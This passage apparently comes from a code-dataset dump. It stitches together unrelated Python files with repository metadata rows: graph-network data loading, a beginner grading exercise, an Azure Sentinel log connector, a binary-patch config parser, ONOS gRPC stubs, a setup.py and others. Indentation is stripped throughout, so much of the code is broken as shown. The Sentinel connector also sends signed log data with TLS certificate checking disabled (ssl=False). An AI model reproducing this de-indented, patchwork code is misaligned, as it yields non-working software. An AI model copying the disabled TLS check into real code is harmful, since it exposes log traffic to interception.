num_feature_maps = X.shape[-1]
class_list = np.unique(content_df["Label"].values)
class2idx = {c: i for i, c in enumerate(class_list)}
num_classes = class_list.shape[0]
Y = np.array(
[class2idx[c] for c in content_df["Label"].values]
)
drop_indices = []
for i, row in cites_df.iterrows():
if str(row["To"]) not in node_list or \
str(row["From"]) not in node_list:
drop_indices.append(i)
cites_df = cites_df.drop(drop_indices)
A = np.zeros([num_nodes, num_nodes])
for _, row in cites_df.iterrows():
to_ = str(row["To"])
from_ = str(row["From"])
A[node2idx[to_], node2idx[from_]] = 1
if not self.directed:
A[node2idx[from_], node2idx[to_]] = 1
# Self Connection
A_tilde = np.copy(A)
for i in range(A_tilde.shape[0]):
A_tilde[i, i] = 1
# Renormalization Trick
D_tilde = np.sum(A_tilde, axis=-1)
A_hat = np.matmul(
np.diag(D_tilde ** (-0.5)),
np.matmul(A_tilde, np.diag(D_tilde ** (-0.5)))
)
class2indices = {}
for c in class_list:
class2indices[c] = []
for i, row in content_df.iterrows():
class2indices[c].append(i)
train_indices = np.hstack(
[
np.random.choice(v, self.num_train_samples_per_class)
for _, v in class2indices.items()
]
)
test_indices = np.delete(np.arange(num_nodes), train_indices)
test_indices = np.random.choice(test_indices, self.num_test_samples)
return A, A_hat, X, Y, node_list, node2idx, num_nodes, \
num_feature_maps, class_list, class2idx, num_classes, \
class2indices, train_indices, test_indices
class Citeseer(CitationNetworks):
def __init__(self, directed) -> None:
super().__init__()
self.directed = directed
self.num_features = 3703
self.dataset_name = "citeseer"
self.dataset_dir = os.path.join(self.dataset_dir, self.dataset_name)
if self.directed:
self.preprocessed_dir = os.path.join(
self.dataset_dir, "directed"
)
else:
self.preprocessed_dir = os.path.join(
self.dataset_dir, "undirected"
)
print(self.preprocessed_dir)
if not os.path.exists(self.preprocessed_dir):
os.mkdir(self.preprocessed_dir)
if os.path.exists(os.path.join(self.preprocessed_dir, "dataset.pkl")):
with open(
os.path.join(self.preprocessed_dir, "dataset.pkl"), "rb"
) as f:
dataset = pickle.load(f)
else:
dataset = self.preprocess()
with open(
os.path.join(self.preprocessed_dir, "dataset.pkl"), "wb"
) as f:
pickle.dump(dataset, f)
self.A, self.A_hat, self.X, self.Y, self.node_list, self.node2idx, \
self.num_nodes, self.num_feature_maps, self.class_list, \
self.class2idx, self.num_classes, self.class2indices, \
self.train_indices, self.test_indices = dataset
class Cora(CitationNetworks):
def __init__(self, directed) -> None:
super().__init__()
self.directed = directed
self.num_features = 1433
self.dataset_name = "cora"
self.dataset_dir = os.path.join(self.dataset_dir, self.dataset_name)
if self.directed:
self.preprocessed_dir = os.path.join(
self.dataset_dir, "directed"
)
else:
self.preprocessed_dir = os.path.join(
self.dataset_dir, "undirected"
)
if not os.path.exists(self.preprocessed_dir):
os.mkdir(self.preprocessed_dir)
if os.path.exists(os.path.join(self.preprocessed_dir, "dataset.pkl")):
with open(
os.path.join(self.preprocessed_dir, "dataset.pkl"), "rb"
) as f:
dataset = pickle.load(f)
else:
dataset = self.preprocess()
with open(
os.path.join(self.preprocessed_dir, "dataset.pkl"), "wb"
) as f:
pickle.dump(dataset, f)
self.A, self.A_hat, self.X, self.Y, self.node_list, self.node2idx, \
self.num_nodes, self.num_feature_maps, self.class_list, \
self.class2idx, self.num_classes, self.class2indices, \
self.train_indices, self.test_indices = dataset
| 3,053 | 3,374 | 121 |
4763556f9202f9225d54195f6543fae5e3581e1f | 573 | py | Python | Course 01 - Getting Started with Python/Extra Studies/Conditionals/ex013.py | marcoshsq/python_practical_exercises | 77136cd4bc0f34acde3380ffdc5af74f7a960670 | [
"MIT"
] | 9 | 2022-03-22T16:45:17.000Z | 2022-03-25T20:22:35.000Z | Course 01 - Getting Started with Python/Extra Studies/Conditionals/ex013.py | marcoshsq/python_practical_exercises | 77136cd4bc0f34acde3380ffdc5af74f7a960670 | [
"MIT"
] | null | null | null | Course 01 - Getting Started with Python/Extra Studies/Conditionals/ex013.py | marcoshsq/python_practical_exercises | 77136cd4bc0f34acde3380ffdc5af74f7a960670 | [
"MIT"
] | 3 | 2022-03-22T17:03:38.000Z | 2022-03-29T17:20:55.000Z | # Exercise 013 - That Classic Average
"""Create a program that reads two grades from a student and calculates their average, showing a message at the end, according to the average achieved:
- Average below 5.0: FAIL"""
grade_01 = float(input("Enter the first grade: "))
grade_02 = float(input("Enter the second grade: "))
average = (grade_01 + grade_02) / 2
if 5 <= average <= 10:
print(f"The student took {average} of note, was approved! ")
elif 0 <= average < 5:
print(f"The student took {average} of note, was disapproved! ")
else:
print("Wrong value")
| 31.833333 | 151 | 0.69808 | # Exercise 013 - That Classic Average
"""Create a program that reads two grades from a student and calculates their average, showing a message at the end, according to the average achieved:
- Average below 5.0: FAIL"""
grade_01 = float(input("Enter the first grade: "))
grade_02 = float(input("Enter the second grade: "))
average = (grade_01 + grade_02) / 2
if 5 <= average <= 10:
print(f"The student took {average} of note, was approved! ")
elif 0 <= average < 5:
print(f"The student took {average} of note, was disapproved! ")
else:
print("Wrong value")
| 0 | 0 | 0 |
ab02a7d8eba9cd4cd4bb02af22d39257d4337a1f | 4,549 | py | Python | Solutions/CrowdStrike Falcon Endpoint Protection/DataConnectors/CrowdstrikeReplicator/CrowdstrikeFalconAPISentinelConnector/sentinel_connector_async.py | relion365/Azure-Sentinel | a13083269ff046928062c9f565db5797e867282b | [
"MIT"
] | 11 | 2019-02-04T13:37:14.000Z | 2019-02-22T20:47:06.000Z | Solutions/CrowdStrike Falcon Endpoint Protection/DataConnectors/CrowdstrikeReplicator/CrowdstrikeFalconAPISentinelConnector/sentinel_connector_async.py | relion365/Azure-Sentinel | a13083269ff046928062c9f565db5797e867282b | [
"MIT"
] | 6 | 2019-02-03T13:58:50.000Z | 2019-02-25T02:01:16.000Z | Solutions/CrowdStrike Falcon Endpoint Protection/DataConnectors/CrowdstrikeReplicator/CrowdstrikeFalconAPISentinelConnector/sentinel_connector_async.py | relion365/Azure-Sentinel | a13083269ff046928062c9f565db5797e867282b | [
"MIT"
] | 12 | 2021-05-11T07:56:50.000Z | 2022-02-11T03:44:01.000Z | import datetime
import logging
import json
import hashlib
import hmac
import base64
import aiohttp
import asyncio
from collections import deque
| 41.733945 | 158 | 0.625852 | import datetime
import logging
import json
import hashlib
import hmac
import base64
import aiohttp
import asyncio
from collections import deque
class AzureSentinelConnectorAsync:
def __init__(self, session: aiohttp.ClientSession, log_analytics_uri, workspace_id, shared_key, log_type, queue_size=1000, queue_size_bytes=25 * (2**20)):
self.log_analytics_uri = log_analytics_uri
self.workspace_id = workspace_id
self.shared_key = shared_key
self.log_type = log_type
self.queue_size = queue_size
self.queue_size_bytes = queue_size_bytes
self._queue = deque()
self.successfull_sent_events_number = 0
self.failed_sent_events_number = 0
self.lock = asyncio.Lock()
self.session = session
async def send(self, event):
events = None
async with self.lock:
self._queue.append(event)
if len(self._queue) >= self.queue_size:
events = list(self._queue)
self._queue.clear()
if events:
await self._flush(events)
async def flush(self):
await self._flush(list(self._queue))
async def _flush(self, data: list):
if data:
data = self._split_big_request(data)
await asyncio.gather(*[self._post_data(self.session, self.workspace_id, self.shared_key, d, self.log_type) for d in data])
def _build_signature(self, workspace_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(workspace_id, encoded_hash)
return authorization
async def _post_data(self, session: aiohttp.ClientSession, workspace_id, shared_key, body, log_type):
logging.debug('Start sending data to sentinel')
events_number = len(body)
body = json.dumps(body)
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self._build_signature(workspace_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = self.log_analytics_uri + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
try_number = 1
while True:
try:
if len(body) < 10:
logging.info(body)
await self._make_request(session, uri, body, headers)
except Exception as err:
if try_number < 3:
logging.warning('Error while sending data to Azure Sentinel. Try number: {}. Trying one more time. {}'.format(try_number, err))
await asyncio.sleep(try_number)
try_number += 1
else:
logging.error(str(err))
self.failed_sent_events_number += events_number
raise err
else:
logging.debug('{} events have been successfully sent to Azure Sentinel'.format(events_number))
self.successfull_sent_events_number += events_number
break
async def _make_request(self, session, uri, body, headers):
async with session.post(uri, data=body, headers=headers, ssl=False) as response:
if not (200 <= response.status <= 299):
raise Exception("Error during sending events to Azure Sentinel. Response code: {}".format(response.status))
def _check_size(self, queue):
data_bytes_len = len(json.dumps(queue).encode())
return data_bytes_len < self.queue_size_bytes
def _split_big_request(self, queue):
if self._check_size(queue):
return [queue]
else:
middle = int(len(queue) / 2)
queues_list = [queue[:middle], queue[middle:]]
return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
| 4,125 | 13 | 265 |
18bb3bc7809f2da3e09891859e20660934914e96 | 1,788 | py | Python | ebp/config.py | ttimasdf/ebp | 994e3f5d40446098b02491f6b6449cb705397d95 | [
"Apache-2.0"
] | 4 | 2018-01-29T09:13:19.000Z | 2021-08-10T06:58:08.000Z | ebp/config.py | ttimasdf/uni-patcher | 994e3f5d40446098b02491f6b6449cb705397d95 | [
"Apache-2.0"
] | 2 | 2017-07-11T13:30:48.000Z | 2020-06-01T07:15:22.000Z | ebp/config.py | ttimasdf/uni-patcher | 994e3f5d40446098b02491f6b6449cb705397d95 | [
"Apache-2.0"
] | 1 | 2020-06-01T07:01:17.000Z | 2020-06-01T07:01:17.000Z | import configparser
BACKUP_SUFFIX = ".bak"
_parser = configparser.ConfigParser()
def parse_file(filename):
"""Return all infomation you needed to patch files"""
_parser.read(filename)
result = {'files': {}}
result['metadata'] = {
"name": _parser['metadata']['name'],
"description": _parser['metadata']['description'],
"congratulation": _parser['metadata']['congratulation'],
} if 'metadata' in _parser else {}
for patch_name in _parser.sections():
if not patch_name.startswith('patch:'):
continue
s = _parser[patch_name]
patch_name = patch_name[6:]
this = {
"unsign": s.getboolean('unsign', False),
"file": s['file'],
"relatives": [],
"absolutes": [],
}
if 'relatives' in s:
for line in s['relatives'].strip('\n, ').split('\n'):
line = line.split(',')
this['relatives'].append({
"src": bytes.fromhex(line[0]),
"dst": bytes.fromhex(line[1]),
"fg": dict(zip(
(_str2range(i) for i in line[2::2]),
(bytes.fromhex(i) for i in line[3::2]))),
})
if 'absolutes' in s:
for line in s['absolutes'].strip('\n, ').split('\n'):
this['absolutes'].append({
"pos": int(line[0]),
"src": bytes.fromhex(line[1]),
"dst": bytes.fromhex(line[2]),
})
result['files'][patch_name] = this
return result
| 30.305085 | 65 | 0.480984 | import configparser
BACKUP_SUFFIX = ".bak"
_parser = configparser.ConfigParser()
def parse_file(filename):
"""Return all infomation you needed to patch files"""
_parser.read(filename)
result = {'files': {}}
result['metadata'] = {
"name": _parser['metadata']['name'],
"description": _parser['metadata']['description'],
"congratulation": _parser['metadata']['congratulation'],
} if 'metadata' in _parser else {}
for patch_name in _parser.sections():
if not patch_name.startswith('patch:'):
continue
s = _parser[patch_name]
patch_name = patch_name[6:]
this = {
"unsign": s.getboolean('unsign', False),
"file": s['file'],
"relatives": [],
"absolutes": [],
}
if 'relatives' in s:
for line in s['relatives'].strip('\n, ').split('\n'):
line = line.split(',')
this['relatives'].append({
"src": bytes.fromhex(line[0]),
"dst": bytes.fromhex(line[1]),
"fg": dict(zip(
(_str2range(i) for i in line[2::2]),
(bytes.fromhex(i) for i in line[3::2]))),
})
if 'absolutes' in s:
for line in s['absolutes'].strip('\n, ').split('\n'):
this['absolutes'].append({
"pos": int(line[0]),
"src": bytes.fromhex(line[1]),
"dst": bytes.fromhex(line[2]),
})
result['files'][patch_name] = this
return result
def _str2range(s):
if '~' in s:
st, en = s.split('~', maxsplit=1)
return (int(st), int(en))
else:
return (int(s), int(s))
| 132 | 0 | 23 |
5859c97e18fc8e9f8c17c8655f9db9df190cf387 | 467 | py | Python | python/5.py | kylekanos/project-euler-1 | af7089356a4cea90f8ef331cfdc65e696def6140 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | python/5.py | kylekanos/project-euler-1 | af7089356a4cea90f8ef331cfdc65e696def6140 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | python/5.py | kylekanos/project-euler-1 | af7089356a4cea90f8ef331cfdc65e696def6140 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2019-09-17T00:55:58.000Z | 2019-09-17T00:55:58.000Z | #!/usr/bin/env python
# for i from 2 to 20
# compute prime factorization of i.
# use largest multiplicity in any
# prime factor seen thus far
facs = {}
for i in xrange(2,21):
f = factorize(i)
for j in f:
facs[j] = max(facs.get(j,0),f[j])
print reduce(lambda x,y: x*y, (i**facs[i] for i in facs))
| 19.458333 | 57 | 0.537473 | #!/usr/bin/env python
# for i from 2 to 20
# compute prime factorization of i.
# use largest multiplicity in any
# prime factor seen thus far
def factorize(n):
d = {}
p=2
while n>=p:
while not n%p:
n//=p
d[p] = d.get(p,0)+1
p+=1
return d
facs = {}
for i in xrange(2,21):
f = factorize(i)
for j in f:
facs[j] = max(facs.get(j,0),f[j])
print reduce(lambda x,y: x*y, (i**facs[i] for i in facs))
| 130 | 0 | 23 |
a88f21775f07697d182770e156e849a1936e4122 | 9,973 | py | Python | python/onos/config/diags/__init__.py | tomikazi/onos-api | fb349a6f26c8453707101aa27712bf16630191d6 | [
"Apache-2.0"
] | 9 | 2021-03-24T10:40:05.000Z | 2022-01-22T08:55:25.000Z | python/onos/config/diags/__init__.py | tomikazi/onos-api | fb349a6f26c8453707101aa27712bf16630191d6 | [
"Apache-2.0"
] | 23 | 2020-11-26T01:29:48.000Z | 2022-03-01T00:33:34.000Z | python/onos/config/diags/__init__.py | tomikazi/onos-api | fb349a6f26c8453707101aa27712bf16630191d6 | [
"Apache-2.0"
] | 29 | 2020-11-25T17:25:45.000Z | 2022-03-30T05:54:15.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: onos/config/diags/diags.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import AsyncIterator, Dict
import betterproto
from betterproto.grpc.grpclib_server import ServiceBase
import grpclib
class Type(betterproto.Enum):
"""Change (Network or Device) event type"""
# NONE indicates this response does not represent a modification of the
# Change
NONE = 0
# ADDED is an event which occurs when a Change is added to the topology
ADDED = 1
# UPDATED is an event which occurs when a Change is updated
UPDATED = 2
# REMOVED is an event which occurs when a Change is removed from the
# configuration
REMOVED = 3
@dataclass(eq=False, repr=False)
class OpStateRequest(betterproto.Message):
"""
OpStateRequest is a message for specifying GetOpState query parameters.
"""
# The request is always in the context of a Device ID. If the device does not
# exist or is disconnected an error will be returned.
device_id: str = betterproto.string_field(1)
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all paths for the device have been streamed to the
# client
subscribe: bool = betterproto.bool_field(2)
@dataclass(eq=False, repr=False)
@dataclass(eq=False, repr=False)
class ListNetworkChangeRequest(betterproto.Message):
"""
ListNetworkChangeRequest requests a stream of changes and updates to them
By default, the request requests a stream of all changes that are present
in the topology when the request is received by the service. However, if
`subscribe` is `true`, the stream will remain open after all changes have
been sent and events that occur following the last changes will be streamed
to the client until the stream is closed. If "withoutReplay" is true then
only changes that happen after the call will be returned
"""
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all devices have been streamed to the client
subscribe: bool = betterproto.bool_field(1)
# option to specify a specific network change - if blank or '*' then select
# all Can support `*` (match many chars) or '?' (match one char) as wildcard
changeid: str = betterproto.string_field(2)
# option to request only changes that happen after the call
without_replay: bool = betterproto.bool_field(3)
@dataclass(eq=False, repr=False)
class ListNetworkChangeResponse(betterproto.Message):
"""ListNetworkChangeResponse carries a single network change event"""
# change is the network change on which the event occurred
change: "_change_network__.NetworkChange" = betterproto.message_field(1)
# type is a qualification of the type of change being made
type: "Type" = betterproto.enum_field(2)
@dataclass(eq=False, repr=False)
class ListDeviceChangeRequest(betterproto.Message):
"""
ListDeviceChangeRequest requests a stream of changes and updates to them By
default, the request requests a stream of all changes that are present in
the topology when the request is received by the service. However, if
`subscribe` is `true`, the stream will remain open after all changes have
been sent and events that occur following the last changes will be streamed
to the client until the stream is closed. If "withoutReplay" is true then
only changes that happen after the call will be returned
"""
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all devices have been streamed to the client
subscribe: bool = betterproto.bool_field(1)
# option to specify a specific device change - if blank or '*' then select
# all Can support `*` (match many chars) or '?' (match one char) as wildcard
device_id: str = betterproto.string_field(2)
# device_version is an optional device version
device_version: str = betterproto.string_field(3)
# option to request only changes that happen after the call
without_replay: bool = betterproto.bool_field(4)
@dataclass(eq=False, repr=False)
class ListDeviceChangeResponse(betterproto.Message):
"""ListDeviceChangeResponse carries a single network change event"""
# change is the device change on which the event occurred
change: "_change_device__.DeviceChange" = betterproto.message_field(1)
# type is a qualification of the type of change being made
type: "Type" = betterproto.enum_field(2)
from .. import admin as _admin__
from ..change import device as _change_device__
from ..change import network as _change_network__
| 36.937037 | 89 | 0.682242 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: onos/config/diags/diags.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import AsyncIterator, Dict
import betterproto
from betterproto.grpc.grpclib_server import ServiceBase
import grpclib
class Type(betterproto.Enum):
"""Change (Network or Device) event type"""
# NONE indicates this response does not represent a modification of the
# Change
NONE = 0
# ADDED is an event which occurs when a Change is added to the topology
ADDED = 1
# UPDATED is an event which occurs when a Change is updated
UPDATED = 2
# REMOVED is an event which occurs when a Change is removed from the
# configuration
REMOVED = 3
@dataclass(eq=False, repr=False)
class OpStateRequest(betterproto.Message):
"""
OpStateRequest is a message for specifying GetOpState query parameters.
"""
# The request is always in the context of a Device ID. If the device does not
# exist or is disconnected an error will be returned.
device_id: str = betterproto.string_field(1)
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all paths for the device have been streamed to the
# client
subscribe: bool = betterproto.bool_field(2)
@dataclass(eq=False, repr=False)
class OpStateResponse(betterproto.Message):
# type is the type of the event
type: "_admin__.Type" = betterproto.enum_field(1)
# device is the device on which the event occurred
pathvalue: "_change_device__.PathValue" = betterproto.message_field(2)
@dataclass(eq=False, repr=False)
class ListNetworkChangeRequest(betterproto.Message):
"""
ListNetworkChangeRequest requests a stream of changes and updates to them
By default, the request requests a stream of all changes that are present
in the topology when the request is received by the service. However, if
`subscribe` is `true`, the stream will remain open after all changes have
been sent and events that occur following the last changes will be streamed
to the client until the stream is closed. If "withoutReplay" is true then
only changes that happen after the call will be returned
"""
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all devices have been streamed to the client
subscribe: bool = betterproto.bool_field(1)
# option to specify a specific network change - if blank or '*' then select
# all Can support `*` (match many chars) or '?' (match one char) as wildcard
changeid: str = betterproto.string_field(2)
# option to request only changes that happen after the call
without_replay: bool = betterproto.bool_field(3)
@dataclass(eq=False, repr=False)
class ListNetworkChangeResponse(betterproto.Message):
"""ListNetworkChangeResponse carries a single network change event"""
# change is the network change on which the event occurred
change: "_change_network__.NetworkChange" = betterproto.message_field(1)
# type is a qualification of the type of change being made
type: "Type" = betterproto.enum_field(2)
@dataclass(eq=False, repr=False)
class ListDeviceChangeRequest(betterproto.Message):
"""
ListDeviceChangeRequest requests a stream of changes and updates to them By
default, the request requests a stream of all changes that are present in
the topology when the request is received by the service. However, if
`subscribe` is `true`, the stream will remain open after all changes have
been sent and events that occur following the last changes will be streamed
to the client until the stream is closed. If "withoutReplay" is true then
only changes that happen after the call will be returned
"""
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all devices have been streamed to the client
subscribe: bool = betterproto.bool_field(1)
# option to specify a specific device change - if blank or '*' then select
# all Can support `*` (match many chars) or '?' (match one char) as wildcard
device_id: str = betterproto.string_field(2)
# device_version is an optional device version
device_version: str = betterproto.string_field(3)
# option to request only changes that happen after the call
without_replay: bool = betterproto.bool_field(4)
@dataclass(eq=False, repr=False)
class ListDeviceChangeResponse(betterproto.Message):
"""ListDeviceChangeResponse carries a single network change event"""
# change is the device change on which the event occurred
change: "_change_device__.DeviceChange" = betterproto.message_field(1)
# type is a qualification of the type of change being made
type: "Type" = betterproto.enum_field(2)
class ChangeServiceStub(betterproto.ServiceStub):
async def list_network_changes(
self,
*,
subscribe: bool = False,
changeid: str = "",
without_replay: bool = False,
) -> AsyncIterator["ListNetworkChangeResponse"]:
request = ListNetworkChangeRequest()
request.subscribe = subscribe
request.changeid = changeid
request.without_replay = without_replay
async for response in self._unary_stream(
"/onos.config.diags.ChangeService/ListNetworkChanges",
request,
ListNetworkChangeResponse,
):
yield response
async def list_device_changes(
self,
*,
subscribe: bool = False,
device_id: str = "",
device_version: str = "",
without_replay: bool = False,
) -> AsyncIterator["ListDeviceChangeResponse"]:
request = ListDeviceChangeRequest()
request.subscribe = subscribe
request.device_id = device_id
request.device_version = device_version
request.without_replay = without_replay
async for response in self._unary_stream(
"/onos.config.diags.ChangeService/ListDeviceChanges",
request,
ListDeviceChangeResponse,
):
yield response
class OpStateDiagsStub(betterproto.ServiceStub):
async def get_op_state(
self, *, device_id: str = "", subscribe: bool = False
) -> AsyncIterator["OpStateResponse"]:
request = OpStateRequest()
request.device_id = device_id
request.subscribe = subscribe
async for response in self._unary_stream(
"/onos.config.diags.OpStateDiags/GetOpState",
request,
OpStateResponse,
):
yield response
class ChangeServiceBase(ServiceBase):
async def list_network_changes(
self, subscribe: bool, changeid: str, without_replay: bool
) -> AsyncIterator["ListNetworkChangeResponse"]:
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def list_device_changes(
self, subscribe: bool, device_id: str, device_version: str, without_replay: bool
) -> AsyncIterator["ListDeviceChangeResponse"]:
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def __rpc_list_network_changes(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {
"subscribe": request.subscribe,
"changeid": request.changeid,
"without_replay": request.without_replay,
}
await self._call_rpc_handler_server_stream(
self.list_network_changes,
stream,
request_kwargs,
)
async def __rpc_list_device_changes(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {
"subscribe": request.subscribe,
"device_id": request.device_id,
"device_version": request.device_version,
"without_replay": request.without_replay,
}
await self._call_rpc_handler_server_stream(
self.list_device_changes,
stream,
request_kwargs,
)
def __mapping__(self) -> Dict[str, grpclib.const.Handler]:
return {
"/onos.config.diags.ChangeService/ListNetworkChanges": grpclib.const.Handler(
self.__rpc_list_network_changes,
grpclib.const.Cardinality.UNARY_STREAM,
ListNetworkChangeRequest,
ListNetworkChangeResponse,
),
"/onos.config.diags.ChangeService/ListDeviceChanges": grpclib.const.Handler(
self.__rpc_list_device_changes,
grpclib.const.Cardinality.UNARY_STREAM,
ListDeviceChangeRequest,
ListDeviceChangeResponse,
),
}
class OpStateDiagsBase(ServiceBase):
async def get_op_state(
self, device_id: str, subscribe: bool
) -> AsyncIterator["OpStateResponse"]:
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def __rpc_get_op_state(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {
"device_id": request.device_id,
"subscribe": request.subscribe,
}
await self._call_rpc_handler_server_stream(
self.get_op_state,
stream,
request_kwargs,
)
def __mapping__(self) -> Dict[str, grpclib.const.Handler]:
return {
"/onos.config.diags.OpStateDiags/GetOpState": grpclib.const.Handler(
self.__rpc_get_op_state,
grpclib.const.Cardinality.UNARY_STREAM,
OpStateRequest,
OpStateResponse,
),
}
from .. import admin as _admin__
from ..change import device as _change_device__
from ..change import network as _change_network__
| 4,476 | 328 | 407 |
6258be964f0d0f522fe9c811d890fe76ef476459 | 1,551 | py | Python | setup.py | fusionbox/django-reversion | a7899ead7348dcd45eb34aa3f0bbfbc9a3c5596b | [
"BSD-3-Clause"
] | null | null | null | setup.py | fusionbox/django-reversion | a7899ead7348dcd45eb34aa3f0bbfbc9a3c5596b | [
"BSD-3-Clause"
] | null | null | null | setup.py | fusionbox/django-reversion | a7899ead7348dcd45eb34aa3f0bbfbc9a3c5596b | [
"BSD-3-Clause"
] | null | null | null | import sys
sys.path.insert(0, 'src/reversion')
from distutils.core import setup
from version import __version__
# Load in babel support, if available.
try:
from babel.messages import frontend as babel
cmdclass = {"compile_catalog": babel.compile_catalog,
"extract_messages": babel.extract_messages,
"init_catalog": babel.init_catalog,
"update_catalog": babel.update_catalog,}
except ImportError:
cmdclass = {}
setup(name="django-reversion",
version='.'.join(str(x) for x in __version__),
license="BSD",
description="An extension to the Django web framework that provides comprehensive version control facilities",
long_description=open("README.markdown").read(),
author="Dave Hall",
author_email="dave@etianen.com",
url="http://github.com/etianen/django-reversion",
zip_safe=False,
packages=["reversion", "reversion.management", "reversion.management.commands", "reversion.migrations"],
package_dir={"": "src"},
package_data = {"reversion": ["locale/*/LC_MESSAGES/django.*", "templates/reversion/*.html"]},
cmdclass = cmdclass,
classifiers=["Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Framework :: Django",])
| 41.918919 | 116 | 0.636364 | import sys
sys.path.insert(0, 'src/reversion')
from distutils.core import setup
from version import __version__
# Load in babel support, if available.
try:
from babel.messages import frontend as babel
cmdclass = {"compile_catalog": babel.compile_catalog,
"extract_messages": babel.extract_messages,
"init_catalog": babel.init_catalog,
"update_catalog": babel.update_catalog,}
except ImportError:
cmdclass = {}
setup(name="django-reversion",
version='.'.join(str(x) for x in __version__),
license="BSD",
description="An extension to the Django web framework that provides comprehensive version control facilities",
long_description=open("README.markdown").read(),
author="Dave Hall",
author_email="dave@etianen.com",
url="http://github.com/etianen/django-reversion",
zip_safe=False,
packages=["reversion", "reversion.management", "reversion.management.commands", "reversion.migrations"],
package_dir={"": "src"},
package_data = {"reversion": ["locale/*/LC_MESSAGES/django.*", "templates/reversion/*.html"]},
cmdclass = cmdclass,
classifiers=["Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Framework :: Django",])
| 0 | 0 | 0 |
c23556b460ef2746f72d4cabfc3efd0e0a592a70 | 634 | py | Python | password.py | nziokaivy/password_locker | 9406dda22dea807c1157b4a4168dc4a943eff3e0 | [
"MIT"
] | null | null | null | password.py | nziokaivy/password_locker | 9406dda22dea807c1157b4a4168dc4a943eff3e0 | [
"MIT"
] | null | null | null | password.py | nziokaivy/password_locker | 9406dda22dea807c1157b4a4168dc4a943eff3e0 | [
"MIT"
] | null | null | null | import random
class Account_user:
"""
Class to create new user accounts and save information
"""
users_list = []
def __init__(self,first_name,password):
'''
Method that helps us define properties that each user account will have
Args:
first_name : main account user name
password : main account password
'''
self.first_name = first_name
self.password = password
def save_user(self):
'''
Method to save new user account objects into users_list
'''
Account_user.users_list.append(self)
| 19.8125 | 79 | 0.594637 | import random
class Account_user:
"""
Class to create new user accounts and save information
"""
users_list = []
def __init__(self,first_name,password):
'''
Method that helps us define properties that each user account will have
Args:
first_name : main account user name
password : main account password
'''
self.first_name = first_name
self.password = password
def save_user(self):
'''
Method to save new user account objects into users_list
'''
Account_user.users_list.append(self)
| 0 | 0 | 0 |
ac8bbc8720f9c64445fe9a7d755e4c38fead6d25 | 14,429 | py | Python | plot.py | nsg-ethz/SDNRacer | 33353177998947580e879941f05862f0173a0c48 | [
"Apache-2.0"
] | 5 | 2016-03-18T15:12:04.000Z | 2019-01-28T20:18:24.000Z | plot.py | nsg-ethz/SDNRacer | 33353177998947580e879941f05862f0173a0c48 | [
"Apache-2.0"
] | null | null | null | plot.py | nsg-ethz/SDNRacer | 33353177998947580e879941f05862f0173a0c48 | [
"Apache-2.0"
] | 1 | 2019-11-02T22:04:48.000Z | 2019-11-02T22:04:48.000Z | #!/usr/bin/env python
import argparse
import csv
import glob
import os
import itertools
from pylab import *
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from asyncore import loop
# Values we care about
keys = []
keys.append('num_read')
keys.append('num_writes')
keys.append('num_ops')
keys.append('num_rw_time_edges')
keys.append('num_ww_time_edges')
keys.append('num_time_edges')
keys.append('num_harmful')
keys.append('num_commute')
keys.append('num_races')
keys.append('num_covered')
keys.append('num_per_pkt_races')
keys.append('num_per_pkt_inconsistent')
keys.append('num_per_pkt_inconsistent_covered')
keys.append('num_per_pkt_entry_version_race')
keys.append('num_per_pkt_inconsistent_no_repeat')
keys.append('total_time_sec')
keys.append('load_time_sec')
keys.append('detect_races_time_sec')
keys.append('extract_traces_time_sec')
keys.append('find_reactive_cmds_time_sec')
keys.append('find_proactive_cmds_time_sec')
keys.append('find_covered_races_time')
keys.append('per_packet_inconsistent_time_sec')
keys.append('find_inconsistent_update_time_sec')
per_pkt_consistency = ['num_per_pkt_races', 'num_per_pkt_inconsistent',
'num_per_pkt_inconsistent_covered',
'num_per_pkt_entry_version_race']
prefixes = ['True-','False-']
timing_values = {'0': 0,
'1': 1,
'2': 2,
'3': 3,
'4': 4,
'5': 5,
'6': 6,
'7': 7,
'8': 8,
'9': 9,
